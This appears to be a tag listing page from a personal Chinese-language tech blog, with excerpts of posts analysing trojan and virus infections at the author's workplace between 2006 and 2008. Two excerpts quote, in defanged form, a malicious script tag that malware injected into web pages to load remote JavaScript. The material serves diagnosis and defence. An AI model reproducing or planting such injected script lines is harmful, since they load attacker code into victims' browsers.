Browse by Tags

小心網路上的詐騙集團

早上聽同事說，不少人收到某同事MSN了一個URL，懷疑是病毒... 過去曾經 解剖過一隻木馬 ，當時第一次見識到不必做什麼傻事(假設沒定期Windows Update不算傻事的話)，一開網頁就中鏢的驚人殺傷力。不過，讓木馬/病毒可以長驅直入的關鍵在於Windows未及時修補安全漏洞。我有點納悶，公司環境有強制Windows更新部署、也統一裝了防毒軟體定期更新病毒碼，莫非這回又遇上什麼強勁的敵手，讓MIS建立的防線瞬間瓦解? 想到這裡，身體裡的駭客血液開始沸騰。 盤問 細問了被控散播病毒的苦主同事...

Posted 25 April 2008 09:56 AM 由 Jeffrey | 1 comment(s)

Filed under: Security, Virus

(C)Brain Age Is Coming Back?

又到了中年人講古的時間了... 二十多年前，以帥氣的吊車尾姿勢，擠上工專錄取的最後一個名額。心想，我這輩子再也不要參加聯考了(造化弄人，後來還是又考了二技)，於是央求家裡買了朝思暮想多年的第一台電腦，宏碁小教授MPF 500，Intel 8088 CPU，4.77MHz， 640M 640K RAM，兩台360K軟碟機FDD(嘖嘖嘖，兩台軟碟當年也算豪華配備呢! 只有一台FDD的機器，整張磁片複製時要抽換三四次哩!)，從此跳入火坑，沒再爬出來過。 那幾年，軟體、資料都是放在賀年卡大小的5.25吋軟碟片帶來帶去...

Posted 20 November 2007 12:14 AM 由 Jeffrey | 5 comment(s)

Filed under: Virus

【茶包射手專欄】沒中毒不代表沒事---ARP木馬

前陣子解剖了一隻 3合1木馬 ，結果該木馬又持續鬧了好幾天，也讓孤陋寡聞的我對病毒木馬的日新月益，再次大開眼界，讚嘆不已... 大部分人的刻板印象是，如果我的機器沒有沒有中毒、沒有中木馬、沒有惡意程式，網路上也沒有人狂送封包轟炸，我使用網路應該不致受到影響吧?? 代誌並不像憨人所想的哈尼甘單~~~ 上回話說該木馬會在你瀏覽網頁時偷偷在HTML前端加入<script src=httq://some_web/trojan.js></script>，而我一直很好奇這是怎麼做到的...

Posted 06 June 2007 05:15 PM 由 Jeffrey | with no comments

Filed under: Security, Virus, Trouble-Shooting

有趣的木馬解剖

同事回報發生了疑似中毒事件，查看的結果，發現中毒的機器用IE讀取網頁時(包含 http://www.google.com.tw )在HTML Source的最前端會被插入一列: <script src="httq://www_blogo_tw/lan.js"></script> (註: 為防止有害URL被誤觸，我做了一些變造處理) 由這個現象，可確定是中了惡意軟體無誤，網管同事最後用 AdWare SE 反間諜軟體將它掃除。但我好奇它的設計原理，情不自禁又鑽了進去... 首先...

Posted 01 June 2007 02:17 AM 由 Jeffrey | 8 comment(s)

Filed under: Javascript, Security, Virus

831病毒事件後記

歷經8月底與 不知名病毒 的 慘烈博鬥 後，公司簽約的防毒公司總算在數天之後出了可以識別該病毒的病毒碼更新，得知其代號為Win32.Bacalid(巴卡雷?)，但是防毒程式似乎只能偵測並阻止有毒檔案被執行，並沒有能力刪除或移除病毒，而且當時我查了各大防毒網站，幾乎沒啥關於該病毒的資訊，但總之毒害不會再擴大，我也就沒再繼續Follow。 前幾天，同事跟我說他的主機回報說偵測到有Bacalid的蹤跡，又喚起我的回億，再次Google，發現已經可以找到許多完整的資訊了(有些資料是9/11日以後才公佈的...

Posted 25 October 2006 11:39 PM 由 Jeffrey | with no comments

Filed under: Security, Virus

病毒震撼教育

起 初，我只是要幫忙看看網路問題而已，真的! 公司有個部門幾天前換了IP，就開始陸續有人回報某幾程式不能跑或一些奇奇怪怪的狀況。原本推測應該是改IP、網域信任之類的問題，卻一直無法找出直接關聯的證據。最後網管將問題縮小具體化為，有一支放在File Server上的程式，某一樓層的可用、另一樓層的人只要一開啟，我的電腦及一些日常操作就會變得極慢，例如: 用檔案總管下按F5 Refresh時，系統就Hang了，但若點一下其他的開著的程式(什麼都好，例如: Notepad，用Developer的角度詮釋就是讓檔案總管Lost...

Posted 02 September 2006 11:58 PM 由 Jeffrey | 2 comment(s)

Filed under: Security, Virus

跟防毒公司比賽--黑暗版的病毒警告

這幾天為了一個幾家防毒軟體大廠都還無法偵測的病毒(或是SpyWare?)搞得人仰馬翻。因為現成的防毒軟體到目前都還沒有解決方案，這裡就先提出我的觀察心得讓大家知道。不過，我並非病毒專家，以下只是個人見解，大家參考就好，不負任何保證責任。 【症狀】 執行了有毒的檔案後， ” 我的電腦 ” 或 ” 檔案總管 ”(Explorer.exe) 的動作會變慢，在某些機器上甚至系統會Hang住一段時間。之後你用檔案總管去開啟任何Folder(包含網路分享的Folder，這是它主要跨電腦傳播的管道)，如果其中有EXE檔或是DLL檔...

Posted 31 August 2006 01:07 PM 由 Jeffrey | 6 comment(s)

Filed under: Security, Virus

搜尋